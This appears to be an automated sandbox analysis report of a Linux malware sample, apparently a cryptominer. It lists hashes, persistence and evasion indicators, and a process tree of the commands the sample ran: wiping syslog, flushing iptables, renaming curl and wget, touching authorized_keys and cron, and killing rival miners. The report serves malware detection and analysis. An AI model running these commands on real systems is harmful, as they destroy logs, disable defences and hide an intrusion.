4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612

General

Target

4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612
Size

35KB
MD5

92fc64f05b1b0597acc58b7cc839a33b
SHA1

f9b3668004fb6810a3a6a44e31fb027782233dfc
SHA256

4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612
SHA512

58431bb60c834224b567727db06c1f6adf0845b76aec00aa18200a0e5a1758e2422695c2ad7268db22e77ea57748adb05affb90bec56bd397d62416c4f885094
SSDEEP

384:EQQwQHDf6lpTWg3vM4Qdre21jT58vKpG2Y0orcfKLUv0KZnNEVdUeUoJpJydIDbS:oFNB48Fkc2zq0xvcGGIZ3L8eW

Score

9^/10

persistence

Malware Config

Signatures

Deletes system logs 1 TTPs 1 IoCs

Indicator Removal on Host
T1070

Processes:

rm

description ioc process

/var/log/syslog /var/log/syslog rm
Modifies the dynamic linker configuration file 1 TTPs 2 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
persistence

Hijack Execution Flow
T1574

Processes:

description ioc process

/etc/ld.so.preload /etc/ld.so.preload
/etc/ld.so.preload /etc/ld.so.preload
Writes file to system bin folder 1 TTPs 1 IoCs

Hijack Execution Flow
T1574

Processes:

egrep

description ioc process

/bin/egrep /bin/egrep egrep
Adds new SSH keys 1 IoCs
Linux special file to hold SSH keys. The threat actor may add new keys for further remote access.
persistence

Processes:

cat

description ioc process

/root/.ssh/authorized_keys /root/.ssh/authorized_keys cat
Creates/modifies Cron job 1 TTPs 2 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
persistence

Scheduled Task
T1053

Processes:

cat

description ioc process

/var/spool/cron/ /var/spool/cron/ cat
/etc/cron.d/tomcat /etc/cron.d/tomcat

description	ioc	process
/var/log/syslog	/var/log/syslog	rm

description	ioc	process
/etc/ld.so.preload	/etc/ld.so.preload
/etc/ld.so.preload	/etc/ld.so.preload

description	ioc	process
/bin/egrep	/bin/egrep	egrep

description	ioc	process
/root/.ssh/authorized_keys	/root/.ssh/authorized_keys	cat

description	ioc	process
/var/spool/cron/	/var/spool/cron/	cat
/etc/cron.d/tomcat	/etc/cron.d/tomcat

Write file to user bin folder 1 TTPs 5 IoCs

Hijack Execution Flow

T1574

Processes:

rmrm

description	ioc	process
/usr/bin/config.json	/usr/bin/config.json	rm
/usr/bin/exin	/usr/bin/exin	rm
/usr/sbin/watchdogs	/usr/sbin/watchdogs
/usr/sbin/service	/usr/sbin/service
/usr/sbin/service	/usr/sbin/service

Writes file to shm directory 4 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.

Processes:

description ioc process

/dev/shm/z3.sh /dev/shm/z3.sh
/dev/shm/z2.sh /dev/shm/z2.sh
/dev/shm/.scr /dev/shm/.scr
/dev/shm/.kerberods /dev/shm/.kerberods

description	ioc	process
/dev/shm/z3.sh	/dev/shm/z3.sh
/dev/shm/z2.sh	/dev/shm/z2.sh
/dev/shm/.scr	/dev/shm/.scr
/dev/shm/.kerberods	/dev/shm/.kerberods

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

T1082

Processes:

pspkillpspspgreppgreppspgreppkillpspspspspspspgreppgreppkillkillpspkillpspspkillpspgreppspspskillpgreppgreppspspkillpkillpspgreppgreppspspkillpspgreppspspgreppkillpkillpspspgreppkillpspspkillpkillpspspspspkillpkillps

Enumerates kernel/hardware configuration 1 TTPs 32 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

Processes:

description	ioc	process
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus
/sys/fs/kdbus/0-system/bus	/sys/fs/kdbus/0-system/bus

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pspgreppgreppkillpkillpkillpspspspkillpspgreppspspspkillpspspspgreppgreppkillpkillpgreppspspspspkillpkillpspspspspspkillpkillpspspspspgreppspspspspkillpspspspgreppspspgreppkillpkillpsps

description	ioc	process
/proc/143/cmdline	/proc/143/cmdline	ps
/proc/83/status	/proc/83/status	pgrep
/proc/1186/cmdline	/proc/1186/cmdline	pgrep
/proc/214/cmdline	/proc/214/cmdline	pkill
/proc/243/cmdline	/proc/243/cmdline	pkill
/proc/146/cmdline	/proc/146/cmdline	pkill
/proc/115/stat	/proc/115/stat	ps
/proc/837/status	/proc/837/status	ps
/proc/79/cmdline	/proc/79/cmdline	ps
/proc/217/cmdline	/proc/217/cmdline	pkill
/proc/217/status	/proc/217/status	ps
/proc/72/status	/proc/72/status	pgrep
/proc/158/stat	/proc/158/stat	ps
/proc/322/stat	/proc/322/stat	ps
/proc/70/stat	/proc/70/stat	ps
/proc/243/status	/proc/243/status	pkill
/proc/self/stat	/proc/self/stat	ps
/proc/244/stat	/proc/244/stat	ps
/proc/15/status	/proc/15/status	ps
/proc/9/cmdline	/proc/9/cmdline	pgrep
/proc/37/cmdline	/proc/37/cmdline	pgrep
/proc/244/status	/proc/244/status	pkill
/proc/6/status	/proc/6/status	pkill
/proc/75/status	/proc/75/status	pgrep
/proc/76/status	/proc/76/status	pkill
/proc/72/stat	/proc/72/stat	ps
/proc/689/stat	/proc/689/stat	ps
/proc/322/cmdline	/proc/322/cmdline	ps
/proc/stat	/proc/stat	ps
/proc/15/cmdline	/proc/15/cmdline	pkill
/proc/7/status	/proc/7/status	pkill
/proc/74/stat	/proc/74/stat	ps
/proc/322/stat	/proc/322/stat	ps
/proc/2/cmdline	/proc/2/cmdline	ps
/proc/9/status	/proc/9/status	ps
/proc/681/stat	/proc/681/stat	ps
/proc/1/cmdline	/proc/1/cmdline	pkill
/proc/218/cmdline	/proc/218/cmdline	pkill
/proc/116/status	/proc/116/status	ps
/proc/672/status	/proc/672/status	ps
/proc/285/status	/proc/285/status	ps
/proc/81/status	/proc/81/status	ps
/proc/1113/stat	/proc/1113/stat	ps
/proc/74/cmdline	/proc/74/cmdline	pgrep
/proc/5/cmdline	/proc/5/cmdline	ps
/proc/15/stat	/proc/15/stat	ps
/proc/71/stat	/proc/71/stat	ps
/proc/6/cmdline	/proc/6/cmdline	ps
/proc/217/status	/proc/217/status	pkill
/proc/322/status	/proc/322/status
/proc/143/status	/proc/143/status	ps
/proc/80/cmdline	/proc/80/cmdline	ps
/proc/73/cmdline	/proc/73/cmdline	ps
/proc/16/status	/proc/16/status	pgrep
/proc/81/cmdline	/proc/81/cmdline	ps
/proc/803/status	/proc/803/status	ps
/proc/12/stat	/proc/12/stat	ps
/proc/74/status	/proc/74/status	pkill
/proc/8/cmdline	/proc/8/cmdline	pgrep
/proc/36/cmdline	/proc/36/cmdline	pkill
/proc/74/status	/proc/74/status	pkill
/proc/4/status	/proc/4/status	ps
/proc/146/status	/proc/146/status	ps
/proc/23/status	/proc/23/status	ps

Writes file to tmp directory 64 IoCs

Malware often drops required files in the /tmp directory.

Processes:

rmrmrmchattrrmrmrmrm4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612rmrmrmrmrmrmrmrmrmrm

description	ioc	process
/tmp/javax/sshd2	/tmp/javax/sshd2	rm
/tmp/xd.json	/tmp/xd.json	rm
/tmp/systemxlv	/tmp/systemxlv	rm
/tmp/osw.hb	/tmp/osw.hb
/tmp/.rod.tgz.1	/tmp/.rod.tgz.1
/tmp/.tmpnewasss	/tmp/.tmpnewasss
/tmp/seasame	/tmp/seasame
/tmp/	/tmp/	chattr
/tmp/php	/tmp/php	rm
/tmp/.omed	/tmp/.omed
/tmp/go	/tmp/go
/tmp/go2.sh	/tmp/go2.sh
/tmp/.p	/tmp/.p
/tmp/.profile	/tmp/.profile	rm
/tmp/65ccEJ7	/tmp/65ccEJ7	rm
/tmp/dl	/tmp/dl	rm
/tmp/.tmpc	/tmp/.tmpc
/tmp/.tmpnewzz	/tmp/.tmpnewzz
/tmp/3lmigMo	/tmp/3lmigMo
/tmp/tmp.txt	/tmp/tmp.txt
/tmp/go.sh	/tmp/go.sh
/tmp/kerberods	/tmp/kerberods
/tmp/kdevtmpfsi	/tmp/kdevtmpfsi	4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612
/tmp/kworkerds3	/tmp/kworkerds3	rm
/tmp/2Ne80nA	/tmp/2Ne80nA	rm
/tmp/.mer.tgz	/tmp/.mer.tgz
/tmp/84Onmce	/tmp/84Onmce
/tmp/khugepageds	/tmp/khugepageds
/tmp/touch	/tmp/touch
/tmp/4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612	/tmp/4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612	4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612
/tmp/walle*	/tmp/walle*	rm
/tmp/lilpip	/tmp/lilpip
/tmp/j2.conf	/tmp/j2.conf
/tmp/runtime2.sh	/tmp/runtime2.sh
/tmp/lok	/tmp/lok
/tmp/sustse	/tmp/sustse	rm
/tmp/.kerberods	/tmp/.kerberods
/tmp/logo9.jpg	/tmp/logo9.jpg
/tmp/devtools	/tmp/devtools
/tmp/j2.conf	/tmp/j2.conf
/tmp/java	/tmp/java
/tmp/nullcrew	/tmp/nullcrew
/tmp/.abc	/tmp/.abc
/tmp/.tmpleve	/tmp/.tmpleve
/tmp/.rod.tgz.2	/tmp/.rod.tgz.2
/tmp/.mer	/tmp/.mer
/tmp/kthrotlds	/tmp/kthrotlds
/tmp/.sysbabyuuuuu12	/tmp/.sysbabyuuuuu12
/tmp/kdevtmpfsi	/tmp/kdevtmpfsi
/tmp/log_rot	/tmp/log_rot	rm
/tmp/ddg	/tmp/ddg	rm
/tmp/gates.lod	/tmp/gates.lod
/tmp/fs	/tmp/fs
/tmp/.pt.tgz.1	/tmp/.pt.tgz.1
/tmp/kworkerdssx	/tmp/kworkerdssx	rm
/tmp/syslogdb	/tmp/syslogdb	rm
/tmp/.rod	/tmp/.rod
/tmp/.lib	/tmp/.lib
/tmp/lib.tar.gz	/tmp/lib.tar.gz
/tmp/keys	/tmp/keys	rm
/tmp/1.so	/tmp/1.so	rm
/tmp/systemctI	/tmp/systemctI
/tmp/C4iLM4L	/tmp/C4iLM4L
/tmp/java	/tmp/java

/tmp/4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612
/tmp/4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612
1⤵
- Writes file to tmp directory
PID:324

/bin/sync
sync
2⤵
PID:325

/bin/cat
cat /var/spool/cron/
2⤵
- Creates/modifies Cron job
PID:330

/bin/cat
cat /root/.ssh/authorized_keys
2⤵
- Adds new SSH keys
PID:331

/bin/mv
mv /usr/bin/curl /usr/bin/url
2⤵
PID:332

/bin/mv
mv /usr/bin/url /usr/bin/cd1
2⤵
PID:333

/bin/mv
mv /usr/bin/wget /usr/bin/get
2⤵
PID:334

/bin/mv
mv /usr/bin/get /usr/bin/wd1
2⤵
PID:335

/bin/rm
rm -rf /var/log/syslog
2⤵
- Deletes system logs
PID:336

/usr/bin/chattr
chattr -iua /tmp/
2⤵
- Writes file to tmp directory
PID:337

/usr/bin/chattr
chattr -iua /var/tmp/
2⤵
PID:338

/sbin/iptables
iptables -F
2⤵
PID:339

/usr/sbin/userdel
userdel akay
2⤵
PID:342

/usr/sbin/userdel
userdel vfinder
2⤵
PID:343

/bin/rm
rm -rf "/tmp/addres*"
2⤵
PID:344

/bin/rm
rm -rf "/tmp/walle*"
2⤵
- Writes file to tmp directory
PID:345

/bin/rm
rm -rf /tmp/keys
2⤵
- Writes file to tmp directory
PID:346

/bin/rm
rm -f /tmp/.null
2⤵
PID:347

/sbin/sysctl
sysctl -w "vm.nr_hugepages=128"
2⤵
PID:348

/bin/grep
grep 185.71.65.238
2⤵
PID:350

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:352

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:351

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:353

/bin/grep
grep 140.82.52.87
2⤵
PID:355

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:356

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:357

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:358

/bin/grep
grep -v -
2⤵
PID:363

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:361

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:364

/bin/grep
grep :443
2⤵
PID:360

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:362

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:367

/bin/grep
grep :23
2⤵
PID:366

/bin/grep
grep -v -
2⤵
PID:369

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:368

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:370

/bin/grep
grep :443
2⤵
PID:372

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:374

/bin/grep
grep -v -
2⤵
PID:375

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:373

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:376

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:379

/bin/grep
grep :143
2⤵
PID:378

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:380

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:382

/bin/grep
grep -v -
2⤵
PID:381

/bin/grep
grep :2222
2⤵
PID:384

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:386

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:385

/bin/grep
grep -v -
2⤵
PID:387

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:388

/bin/grep
grep :3333
2⤵
PID:390

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:391

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:392

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:394

/bin/grep
grep -v -
2⤵
PID:393

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:397

/bin/grep
grep :3389
2⤵
PID:396

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:398

/bin/grep
grep -v -
2⤵
PID:399

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:400

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:403

/bin/grep
grep :5555
2⤵
PID:402

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:404

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:406

/bin/grep
grep -v -
2⤵
PID:405

/bin/grep
grep :6666
2⤵
PID:408

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:410

/bin/grep
grep -v -
2⤵
PID:411

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:409

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:412

/bin/grep
grep :6665
2⤵
PID:414

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:416

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:415

/bin/grep
grep -v -
2⤵
PID:417

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:418

/bin/grep
grep :6667
2⤵
PID:420

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:422

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:421

/bin/grep
grep -v -
2⤵
PID:423

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:424

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:427

/bin/grep
grep :7777
2⤵
PID:426

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:428

/bin/grep
grep -v -
2⤵
PID:429

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:430

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:433

/bin/grep
grep :8444
2⤵
PID:432

/bin/grep
grep -v -
2⤵
PID:435

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:436

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:434

/bin/grep
grep :3347
2⤵
PID:438

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:439

/bin/grep
grep -v -
2⤵
PID:441

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:442

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:440

/bin/grep
grep :3333
2⤵
PID:445

/bin/grep
grep -v grep
2⤵
PID:444

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:446

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:447

/bin/ps
ps aux
2⤵
PID:443

/bin/grep
grep -v grep
2⤵
PID:449

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:451

/bin/ps
ps aux
2⤵
PID:448

/bin/grep
grep :5555
2⤵
PID:450

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:452

/bin/grep
grep -v grep
2⤵
PID:454

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:453

/bin/grep
grep "kworker -c\\"
2⤵
PID:455

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:456

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:457

/bin/grep
grep -v grep
2⤵
PID:459

/bin/ps
ps aux
2⤵
PID:458

/bin/grep
grep log_
2⤵
PID:460

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:462

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:461

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:466

/bin/grep
grep systemten
2⤵
PID:465

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:467

/bin/grep
grep -v grep
2⤵
PID:464

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:463

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:471

/bin/grep
grep netns
2⤵
PID:470

/bin/grep
grep -v grep
2⤵
PID:469

/bin/ps
ps aux
2⤵
PID:468

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:472

/usr/local/sbin/kill
kill -9 10
3⤵
PID:473

/usr/local/bin/kill
kill -9 10
3⤵
PID:473

/usr/sbin/kill
kill -9 10
3⤵
PID:473

/usr/bin/kill
kill -9 10
3⤵
PID:473

/sbin/kill
kill -9 10
3⤵
PID:473

/bin/kill
kill -9 10
3⤵
- Reads CPU attributes
PID:473

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:477

/bin/grep
grep voltuned
2⤵
PID:476

/bin/grep
grep -v grep
2⤵
PID:475

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:478

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:474

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:482

/bin/grep
grep darwin
2⤵
PID:481

/bin/grep
grep -v grep
2⤵
PID:480

/bin/ps
ps aux
2⤵
PID:479

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:483

/bin/grep
grep /tmp/dl
2⤵
PID:486

/bin/grep
grep -v grep
2⤵
PID:485

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:484

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:488

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:487

/bin/grep
grep -v grep
2⤵
PID:490

/bin/grep
grep /tmp/ddg
2⤵
PID:491

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:493

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:492

/bin/ps
ps aux
2⤵
PID:489

/bin/grep
grep -v grep
2⤵
PID:495

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:494

/bin/grep
grep /tmp/pprt
2⤵
PID:496

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:498

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:497

/bin/grep
grep /tmp/ppol
2⤵
PID:501

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:499

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:503

/bin/grep
grep -v grep
2⤵
PID:500

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:502

/bin/grep
grep "/tmp/65ccE*"
2⤵
PID:506

/bin/grep
grep -v grep
2⤵
PID:505

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:504

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:508

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:507

/bin/grep
grep -v grep
2⤵
PID:510

/bin/ps
ps aux
2⤵
PID:509

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:512

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:513

/bin/grep
grep "/tmp/jmx*"
2⤵
PID:511

/bin/grep
grep -v grep
2⤵
PID:515

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:514

/bin/grep
grep "/tmp/2Ne80*"
2⤵
PID:516

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:517

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:518

/bin/grep
grep -v grep
2⤵
PID:520

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:523

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:522

/bin/grep
grep IOFoqIgyC0zmf2UR
2⤵
PID:521

/bin/ps
ps aux
2⤵
PID:519

/bin/grep
grep -v grep
2⤵
PID:525

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:524

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:527

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:528

/bin/grep
grep 45.76.122.92
2⤵
PID:526

/bin/grep
grep -v grep
2⤵
PID:530

/bin/ps
ps aux
2⤵
PID:529

/bin/grep
grep 51.38.191.178
2⤵
PID:531

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:533

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:532

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:537

/bin/grep
grep 51.15.56.161
2⤵
PID:536

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:538

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:534

/bin/grep
grep -v grep
2⤵
PID:535

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:542

/bin/grep
grep 86s.jpg
2⤵
PID:541

/bin/grep
grep -v grep
2⤵
PID:540

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:543

/bin/ps
ps aux
2⤵
PID:539

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:547

/bin/grep
grep aGTSGJJp
2⤵
PID:546

/bin/grep
grep -v grep
2⤵
PID:545

/bin/ps
ps aux
2⤵
PID:544

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:548

/bin/grep
grep -v grep
2⤵
PID:550

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:549

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:552

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:553

/bin/grep
grep nMrfmnRa
2⤵
PID:551

/bin/grep
grep -v grep
2⤵
PID:555

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:554

/bin/grep
grep PuNY5tm2
2⤵
PID:556

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:557

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:558

/bin/grep
grep -v grep
2⤵
PID:560

/bin/ps
ps aux
2⤵
PID:559

/bin/grep
grep I0r8Jyyt
2⤵
PID:561

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:562

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:563

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:567

/bin/grep
grep AgdgACUD
2⤵
PID:566

/bin/grep
grep -v grep
2⤵
PID:565

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:564

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:568

/bin/grep
grep uiZvwxG8
2⤵
PID:571

/bin/grep
grep -v grep
2⤵
PID:570

/bin/ps
ps aux
2⤵
PID:569

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:573

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:572

/bin/grep
grep -v grep
2⤵
PID:575

/bin/grep
grep hahwNEdB
2⤵
PID:576

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:577

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:578

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:574

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:582

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:583

/bin/grep
grep BtwXn5qH
2⤵
PID:581

/bin/grep
grep -v grep
2⤵
PID:580

/bin/ps
ps aux
2⤵
PID:579

/bin/grep
grep -v grep
2⤵
PID:585

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:587

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:584

/bin/grep
grep 3XEzey2T
2⤵
PID:586

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:588

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:592

/bin/grep
grep t2tKrCSZ
2⤵
PID:591

/bin/grep
grep -v grep
2⤵
PID:590

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:589

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:593

/bin/grep
grep svc
2⤵
PID:596

/bin/grep
grep -v grep
2⤵
PID:595

/bin/ps
ps aux
2⤵
PID:594

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:597

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:598

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:602

/bin/grep
grep HD7fcBgg
2⤵
PID:601

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:603

/bin/grep
grep -v grep
2⤵
PID:600

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:599

/bin/grep
grep zXcDajSs
2⤵
PID:606

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:607

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:608

/bin/grep
grep -v grep
2⤵
PID:605

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:604

/bin/grep
grep 3lmigMo
2⤵
PID:611

/bin/grep
grep -v grep
2⤵
PID:610

/bin/ps
ps aux
2⤵
PID:609

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:613

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:612

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:617

/bin/grep
grep AkMK4A2
2⤵
PID:616

/bin/grep
grep -v grep
2⤵
PID:615

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:618

/bin/ps
ps aux
2⤵
PID:614

/bin/grep
grep -v grep
2⤵
PID:620

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:619

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:622

/bin/grep
grep AJ2AkKe
2⤵
PID:621

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
